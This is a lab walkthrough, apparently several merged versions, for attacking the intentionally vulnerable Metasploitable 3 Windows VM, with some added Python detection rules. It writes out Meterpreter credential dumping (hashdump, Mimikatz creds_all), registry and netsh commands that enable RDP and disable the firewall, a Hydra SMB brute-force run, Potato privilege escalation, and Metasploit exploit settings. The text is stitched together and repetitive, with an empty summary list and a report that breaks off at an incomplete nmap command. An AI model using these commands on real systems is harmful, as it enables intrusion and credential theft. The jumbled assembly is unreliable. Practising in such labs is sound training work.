Metasploitable 3 Windows Walkthrough

After gaining a session:

getsystem                    # attempt privilege escalation
hashdump                     # dump NTLM hashes
load kiwi                    # load Mimikatz
creds_all                    # grab plaintext credentials
shell                        # drop to Windows cmd

Enable RDP remotely:

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall set allprofiles state off
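Both commands leave a distinctive trace in process-creation telemetry (Sysmon Event ID 1, or Security Event 4688 with command-line auditing enabled), which is what a blue team would key on. The following Python is an added example, not part of the original walkthrough: it runs two detection rules over a constructed set of process records; the record fields, host name and user names are assumptions.

```python
import re

# Constructed process-creation records in the shape of Sysmon Event ID 1 (or
# Security 4688 with command-line auditing). Field names and sample values are
# assumptions for this example, not a real log export.
SAMPLE_EVENTS = [
    {"host": "WIN2K8-M3", "user": "WIN2K8-M3\\vagrant",
     "cmdline": 'reg add "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server" '
                '/v fDenyTSConnections /t REG_DWORD /d 0 /f'},
    {"host": "WIN2K8-M3", "user": "NT AUTHORITY\\SYSTEM",
     "cmdline": "netsh advfirewall set allprofiles state off"},
    {"host": "WIN2K8-M3", "user": "WIN2K8-M3\\vagrant",
     "cmdline": "reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion"},
    {"host": "WIN2K8-M3", "user": "WIN2K8-M3\\vagrant",
     "cmdline": "netsh advfirewall show allprofiles"},
]

# Each rule pairs a name with a regex applied to the whole command line.
# The RDP rule only fires on /d 0 (connections allowed), not on /d 1.
RULES = [
    ("rdp_enabled_via_registry",
     re.compile(r"reg\s+add\b.*terminal server.*fDenyTSConnections.*/d\s+0\b", re.I)),
    ("host_firewall_disabled",
     re.compile(r"netsh\s+advfirewall\s+set\s+(allprofiles|\w+profile)\s+state\s+off", re.I)),
]

def match_rules(cmdline):
    """Return the names of every rule the command line triggers."""
    return [name for name, rx in RULES if rx.search(cmdline)]

def detect(events):
    """Return the suspicious events, each annotated with the rules it matched."""
    hits = []
    for ev in events:
        names = match_rules(ev.get("cmdline", ""))
        if names:
            hits.append({**ev, "rules": names})
    return hits

if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(f"[{','.join(hit['rules'])}] {hit['user']}: {hit['cmdline']}")
```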

# Use vulners script to find known CVEs
nmap --script vulners -sV -p 445,8080,8585,9200 192.168.1.100

| Problem | Solution |
|---------|----------|
| EternalBlue fails | Use auxiliary/scanner/smb/smb_ms17_010 first. Target may need reboot. |
| WinRM access denied | Ensure winrm quickconfig and Set-Item WSMan:\localhost\Client\TrustedHosts -Value "*" on target. |
| Jenkins reverse shell no connection | Check Windows firewall – disable it or allow inbound port. |
| Vagrant VM not starting | Increase RAM to 4GB, enable VT-x in BIOS. |


hydra -l administrator -P /usr/share/wordlists/rockyou.txt 192.168.56.102 smb

The password is often vagrant or mcpassword123. (Check the Vagrant build files).
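On the target, Hydra's SMB spray shows up as a burst of failed logons (Security Event ID 4625) from a single source address. This Python is an added example, not from the walkthrough: it groups constructed 4625-style records into a sliding window per source and alerts once a threshold is reached; the record format, threshold, window length and sample data are assumptions.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed, simplified Security Event 4625 (failed logon) records for this
# example: "timestamp source_ip target_user logon_type". Real exports carry far
# more fields, and the attacker address 192.168.56.101 is made up.
SAMPLE_4625 = """\
2024-01-10T09:00:00 192.168.56.101 administrator 3
2024-01-10T09:00:01 192.168.56.101 administrator 3
2024-01-10T09:00:01 192.168.56.101 administrator 3
2024-01-10T09:00:02 192.168.56.101 administrator 3
2024-01-10T09:00:02 192.168.56.101 administrator 3
2024-01-10T09:00:03 192.168.56.101 administrator 3
2024-01-10T09:05:00 192.168.56.50 jsmith 2
2024-01-10T09:30:00 192.168.56.50 jsmith 2
"""

THRESHOLD = 5                   # failures per source inside one window (assumption)
WINDOW = timedelta(seconds=60)  # sliding window length (assumption)

def parse_4625(text):
    """Parse the constructed record format into (time, src_ip, user, logon_type)."""
    records = []
    for line in text.splitlines():
        if line.strip():
            ts, src, user, ltype = line.split()
            records.append((datetime.fromisoformat(ts), src, user, ltype))
    return records

def brute_force_alerts(records, threshold=THRESHOLD, window=WINDOW):
    """Return one alert per source IP that reaches `threshold` failures in `window`.

    Records are walked in time order; a per-source deque keeps only timestamps
    still inside the window, so state stays small and the alert fires once.
    """
    recent = defaultdict(deque)
    alerted = {}
    for ts, src, user, _ in sorted(records):
        q = recent[src]
        q.append(ts)
        while ts - q[0] > window:   # drop failures that aged out of the window
            q.popleft()
        if len(q) >= threshold and src not in alerted:
            alerted[src] = {"source": src, "first_seen": q[0].isoformat(),
                            "failures_in_window": len(q), "last_user": user}
    return list(alerted.values())

if __name__ == "__main__":
    for alert in brute_force_alerts(parse_4625(SAMPLE_4625)):
        print(alert)   # one alert, for 192.168.56.101
```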

Check whether the current token holds SeImpersonatePrivilege or similar impersonation privileges.

Use Metasploit's getsystem first, but it may fail. If so, try the Potato family of exploits:

msf6 > use exploit/windows/local/ms16_075_reflection_juicy

Or manually upload and run JuicyPotato.exe.


If you have vagrant:vagrant or administrator:vagrant, you can use WinRM.

# Install evil-winrm
gem install evil-winrm

This walkthrough of Metasploitable 3 Windows demonstrates a critical truth: complex exploits such as EternalBlue are cool, but simple misconfigurations such as WinRM with weak passwords are how real breaches happen.

We covered:

Metasploitable 3 is harder than its Linux predecessor, but mastering it puts you miles ahead of script kiddies. You now understand not just how to type an exploit, but why Windows networks fall.

Next Steps:

Now, go revert your snapshot and do it again—this time, without looking at the notes.


Metasploitable 3 Windows Walkthrough: A Comprehensive Guide

If you are diving into the world of penetration testing, Metasploitable 3 is your ultimate playground. Unlike its predecessor, which was a Linux-only VM, Metasploitable 3 offers a Windows version (typically based on Windows Server 2008 R2) that is intentionally riddled with vulnerabilities.

This walkthrough covers the setup and several key exploitation paths to help you sharpen your Red Team skills.

1. Lab Setup

Before hacking, you need to build the environment. Metasploitable 3 is unique because it is built automatically using Vagrant and Packer.

Install Prerequisites: You’ll need VirtualBox, Vagrant, and the vagrant-vbguest plugin.

Build the VM:

mkdir metasploitable3 && cd metasploitable3
vagrant init rapid7/metasploitable3-win2k8
vagrant up

Networking: Ensure your attacking machine (Kali Linux) is on the same host-only network as the Metasploitable 3 instance.

2. Information Gathering

The first step in any engagement is reconnaissance. Let’s identify the open ports and services.

Nmap Scan:

nmap -sV -sC -O 192.168.x.x

You will notice a massive attack surface, including:

Port 80/443: IIS 7.5
Port 445: SMB
Port 1433: MSSQL
Port 3306: MySQL
Port 9200: Elasticsearch

3. Exploitation Path A: ElasticSearch (Remote Code Execution)

ElasticSearch on Metasploitable 3 is often an older version vulnerable to CVE-2014-3120. This allows for dynamic script execution.

Search for the exploit: In Metasploit, use search elasticsearch.

Configure:

use exploit/multi/elasticsearch/script_static_iv_clobber
set RHOSTS [Target IP]
set LHOST [Your IP]
exploit

Result: You should receive a Meterpreter session running as the user under which ElasticSearch is installed.

4. Exploitation Path B: ManageEngine Desktop Central

Metasploitable 3 hosts an instance of ManageEngine that is vulnerable to a file upload vulnerability (CVE-2015-8249).

Search: use exploit/windows/http/manageengine_connectionid_write.

Execute: Set your RHOSTS and RPORT (usually 8020).

Result: This often grants SYSTEM level access immediately, as the service runs with high privileges.

5. Exploitation Path C: Weak Credentials (SMB/MSSQL)

Metasploitable 3 simulates real-world "bad habits," like using default or weak passwords.

SMB: You can use auxiliary/scanner/smb/smb_login with common wordlists.

MSSQL: The sa account often has a weak password. Use exploit/windows/mssql/mssql_payload once you have credentials to gain a shell.

6. Post-Exploitation & Privilege Escalation

Once you have a foothold (a standard user shell), your goal is to become NT AUTHORITY\SYSTEM.

Local Exploit Suggester:

use post/multi/recon/local_exploit_suggester
set SESSION 1
run

Token Impersonation: If you are an admin but not SYSTEM, use the incognito module in Meterpreter:

use incognito
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"

7. The Flags

Metasploitable 3 is designed as a Capture The Flag (CTF) environment. Look for custom icons or text files scattered throughout the system (e.g., on the Administrator's desktop or in the root directory). Each flag represents a successfully compromised service.

Metasploitable 3 Windows serves as a valuable tool for understanding how common misconfigurations and legacy software vulnerabilities can affect a Windows environment. Exploring these pathways provides insight into the importance of regular patching, secure configuration management, and the principle of least privilege.

By identifying these weaknesses in a controlled laboratory setting, security professionals can better develop defensive strategies, improve incident response procedures, and strengthen the overall security posture of production systems.

🛡️ Penetration Testing Report: Metasploitable 3 (Windows)

1. Executive Summary

This assessment details the security posture of the Metasploitable 3 Windows virtual machine. The objective of this exercise was to identify security vulnerabilities, demonstrate exploitation vectors, and provide remediation steps to secure the asset. Multiple high- and critical-severity vulnerabilities were identified, including unauthenticated remote code execution and weak credential policies.

Target Details:

Operating System: Windows Server 2008 R2 (Metasploitable 3)
IP Address: 192.168.1.36 (Example IP)
Testing Machine: Kali Linux

2. Methodology & Phases

The engagement followed the Penetration Testing Execution Standard:

Reconnaissance & Scanning: Discovering live hosts and open ports.
Vulnerability Analysis: Identifying outdated software and weak configurations.
Exploitation: Gaining initial access to the system.
Privilege Escalation: Elevating standard user access to administrative rights.

3. Detailed Walkthrough

🔍 Phase 1: Scanning & Enumeration

The initial step involved identifying exposed attack surfaces using Nmap.

nmap -sV -sC -A
